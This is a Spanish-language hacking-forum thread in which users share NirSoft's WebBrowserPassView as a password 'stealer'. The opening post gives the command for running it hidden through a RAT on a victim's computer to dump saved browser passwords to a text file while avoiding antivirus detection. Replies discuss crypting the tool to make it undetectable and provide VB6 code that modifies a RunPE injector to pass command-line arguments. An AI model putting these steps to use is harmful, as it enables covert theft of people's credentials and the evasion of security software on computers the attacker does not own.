Buenas amigos, de tanto buscar stealer que me funcionen a medias o hay que estar encriptandolos etc... me encontre con este programa que me gusto y lo comparto por que se me hace que a alguno le servira quizas

Imagen

WebBrowserPassView es una herramienta de recuperación de contraseña que revela las contraseñas almacenadas por los siguientes navegadores Web: Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (todas las versiones), Google Chrome, Safari y Opera. Esta herramienta puede ser utilizada para recuperar su / contraseña perdida olvidada de cualquier sitio web, incluyendo sitios web populares, como Facebook, Yahoo, Google y Gmail, siempre y cuando la contraseña se almacena en tu navegador web.
Después de recuperar las contraseñas perdidas, puede guardarlos en texto / html / csv / xml, mediante el uso de la opción
Como dice el texto citado es para recuperar contraseñas y funciona muy bien, ahora un buen dato:

Esta herramienta parece molesta para abrirla desde un remoto y tratar de controlarla pero tiene una ventaja muy buena para vos piyin que seguro queres hacer todo oculto sin que nadie vea nada, como un golpe en la oscuridad que nadie se hace cargo

- Subimos el archivo WebBrowserPassView.exe al remoto y lo ubicamos en el disco "C" por ejemplo.

- Entramos con el rat a la consola de comandos, nos situamos en la carpeta donde esta el ejecutable y escribimos esto

Código: Seleccionar todo

start WebBrowserPassView.exe /stext pass.txt
/stext lo que hace es guardar todos las contraseñas en este caso yo le puse "pass.txt" . Entonces cuando ejecutamos el comando el programa no sale visible y automaticamente crea el archivo con las contraseñas guardadas ...

Si escaneas el archivo por algun scanner te sale que lo detectan vaaarios antivirus , pero cuando lo hice remotamente de el modo en el que lo explique no salto de ninguna manera el AV del cliente , nose ni como ni cuando ni por que pero funciona jajaj



Descarga de la web del autor

[Enlace externo eliminado para invitados]


Cada uno se hace responsable del uso que le de a esta herramienta
Blau escribió:Las herramientas de NirSoft son muy conocidas, por ello lo detectan tanto los Avs. Hace tiempo hice un stealer que usaba estas herramientas: http://www.indetectables.net/viewtopic.php?f=7&t=48772

Mira vos che nunca vi ese post! Lo voy a probar :) , si como les dije varios avs lo detectan pero al instante de hacer el proceso ese no salto el AV para nada ni bloqueo el programa.. Digamos que funciona
Muy util gracias !!
Es muy detectado y ocurre algo curioso lo encripte con un cripter mio lo deje fud y si lo ejecuto desde linea de comandos aparece en pantalla pero sin encriptar como vos dijiste cuando lo ejecuto desde cmd no se ve
TITAN escribió:Muy util gracias !!
Es muy detectado y ocurre algo curioso lo encripte con un cripter mio lo deje fud y si lo ejecuto desde linea de comandos aparece en pantalla pero sin encriptar como vos dijiste cuando lo ejecuto desde cmd no se ve
Es que el RUNPE que usa el cripter no acepta parametros es ahi el detalle, solo carga el exe y lo executa en memoria mas no le pasa parametros.

Blau creo ya tenia un cripter que funciona asi
De una ! A mi tambien me pasaba cuando lo encriptaba y mostraba el programa cosa que no me servia, pero con lo que dijo adwind dejo todo en claro Gracias !
Excelente herramienta, gracias Shoseff!, ya conocia la página de NirSoft y alguna de sus herramientas, pero esta no, muchas gracias un saludo...
http://s2.subirimagenes.com/imagen/previo/thump_9434258sss.png
Jo, yo en mi pc normal se me abre pero no sale nada. Y en otro con windows xp me sale sólo el chrome pero me sale la cuenta, no la pass... Pero gracias por el aporte! voy a mirar más a ver que ocurre ;)
adwind escribió:
TITAN escribió:Muy util gracias !!
Es muy detectado y ocurre algo curioso lo encripte con un cripter mio lo deje fud y si lo ejecuto desde linea de comandos aparece en pantalla pero sin encriptar como vos dijiste cuando lo ejecuto desde cmd no se ve
Es que el RUNPE que usa el cripter no acepta parametros es ahi el detalle, solo carga el exe y lo executa en memoria mas no le pasa parametros.

Blau creo ya tenia un cripter que funciona asi

Es verdad... si lo encryptas, luego la linea de comandos deja de funcionar.
No es nada difícil modificar un RunPE para que acepte parámetros, aquí explicaré como hacerlo en VB6:
1) Cogemos la función principal de inyectar y le añadimos un parámetro más:
Public Function Inject(ByVal proceso As String, bin() As Byte, params As String) As Long
2) Ahora buscamos la función CreateProcess e insertamos el parámetro en el segundo argumento:
If CreateProcess(vbNullString, proceso & " " & params, 0, 0, False, CREATE_SUSPENDED, 0, 0, X, Y) = 0 Then
Hola que tal amigos... Resulta y pasa que escribi en el cmd tal cual la linea de comando " start WebBrowserPassView.exe /stext pass.txt " pero no me sirvio

se abre el ejecutable ( cosa que no quiero xd )
y no se crea el fichero .txt con las contraseñas dentro...

que podria estar pasando ?
Responder

Volver a “Manuales y Tutoriales”